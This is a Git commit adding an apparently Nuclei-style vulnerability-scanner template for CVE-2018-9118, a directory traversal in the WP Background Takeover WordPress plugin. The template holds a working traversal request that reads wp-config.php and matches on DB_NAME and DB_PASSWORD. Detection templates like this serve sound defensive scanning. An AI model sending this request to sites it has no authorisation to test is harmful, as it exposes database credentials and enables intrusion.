Create CVE-2018-9118.yaml

patch-1
Roberto Nunes 2021-07-15 18:59:40 +09:00 committed by GitHub
parent e82d39a616
commit cfe930513b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

27
CVE-2018-9118.yaml Normal file
View File

@ -0,0 +1,27 @@
id: cve-2018-9118
info:
name: WP Background Takeover, Directory Traversal <= 4.1.4
author: 0x_Akoko
severity: high
tags: wordpress,wp-plugin,lfi
description: Affected by this vulnerability is an unknown functionality of the file exports/download.php. The manipulation of the argument filename with the input value leads to a directory traversal vulnerability
reference: https://www.exploit-db.com/exploits/44417
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200